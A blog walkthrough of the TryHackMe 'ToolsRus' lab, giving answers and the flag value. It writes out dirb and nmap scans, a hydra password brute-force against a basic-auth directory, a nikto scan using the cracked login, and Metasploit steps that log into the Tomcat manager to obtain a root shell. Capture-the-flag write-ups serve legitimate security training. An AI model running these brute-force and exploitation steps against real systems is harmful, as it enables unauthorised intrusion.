ToolsRus WriteUp – TryHackMe


In this article, I will try to present you the solution of the “ToolsRus” room. An entertaining application has been prepared for you by using “Nikto”, “Dirb”, “Nmap” and “Meterpreter” applications in this room on tryhackme site.

I will use the web-based Kali Linux system that tryhackme provided me. I will support the answers with many pictures.

My private IP: 10.10.73.132

Machine IP: 10.10.176.215


[Task 1] ToysRus

#1What directory can you find, that begins with a “g”?

To find the answer to this question, I need to run “Dirb”.

In the picture above you see the “dirb” result. I showed the answer to the question with a red arrow.

ANSWER: guidelines


#2 Whose name can you find from this directory?

To find the answer to this question, we need to go to the “guidelines” directory.

ANSWER: bob


#3 What directory has basic authentication?

To find the answer to this question, we need to check the other directories we obtained as a result of the “dirb” scan.

ANSWER: protected


#4 What is bob’s password to the protected part of the website?

We need to use the “hydra” tool to find the answer to this question. We need a worldlist to use “Hydra”. I brought the “rockyou.txt” file to the “/ root / Desktop” directory. We will run the “hydra” tool for the username “bob”.

hydra -l bob -P <worldlist location> -f <machine IP> http-get /protected/

The “hydra” command I run for my computer is as follows and the result is as follows. We find the password of the user “bob” with “hydra”.

hydra -l bob -P /root/Desktop/rockyou.txt -f 10.10.176.215 http-get /protected/

ANSWER: bubbles


#5 What other port that serves a webs service is open on the machine?

To find the answer to this question, we need to query “nmap”. My query is as follows.

nmap -sC -sV -A -v <machine IP> 

ANSWER: 1234


#6 Going to the service running on that port, what is the name and version of the software?

The answer is seen in the “nmap” query above.

ANSWER: Apache Tomcat/7.0.88


#7 Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above. How many documentation files did Nikto identify?

To find the answer to this question, I wrote a “nikto” query like this. I put a red mark next to the answers.

nikto -h http://<machine IP>:1234/manager/html -id bob:<bob password>

ANSWER: 5


#8 What is the server version (run the scan against port 80)?

The answer to this question is found in the “nmap” query above.

ANSWER: Apache/2.4.18


#9 What version of Apache-Coyote is this service using?

The answer to this question is found in the “nmap” query above.

ANSWER: 1.1


#10 Use Metasploit to exploit the service and get a shell on the system. What user did you get a shell as?

To find the answer to this question, let’s first do some research. First, let’s login with “bob” user on “Tomcat” web page.

We went to the “http: // : 1234 / manager / html” page and logged in with the password we found for the user “bob” and accessed the above page. Let’s try to infiltrate the system using the “metasploit” framework.

After running the msfconsole application, I searched for “tomcat” for vulnerabilities. Just use the command below.

search tomcat

The results are as follows.

I will use the number 17 vulnerability. You can use it with the command below.

use 17

Now let’s view the options we need.

You can use the following commands respectively.

set HttpPassword bubbles
set HttpUsername bob
set Rhost <machine IP>
set Rport 1234

After I fill them in, I check them again with the “show options” command.

As you can see, this is the result after filling. Now let’s run this. Just use the command below.

run

After running it I immediately got a “shell”. Then the system displayed which user I am.

ANSWER: root


#11 What text is in the file /root/flag.txt

The answer to this question actually appears in the picture above.

ANSWER: ff1fc4a81affcc7688cf89ae7dc6e0e1


If you have come here successfully, congratulations. I tried to explain it in detail as much as I could. I hope it helped you.

See you in the next write-up.

Bir Cevap Yazın

Aşağıya bilgilerinizi girin veya oturum açmak için bir simgeye tıklayın:

WordPress.com Logosu

WordPress.com hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Google fotoğrafı

Google hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Twitter resmi

Twitter hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Facebook fotoğrafı

Facebook hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Connecting to %s

WordPress.com'da Blog Oluşturun.

Yukarı ↑

%d blogcu bunu beğendi: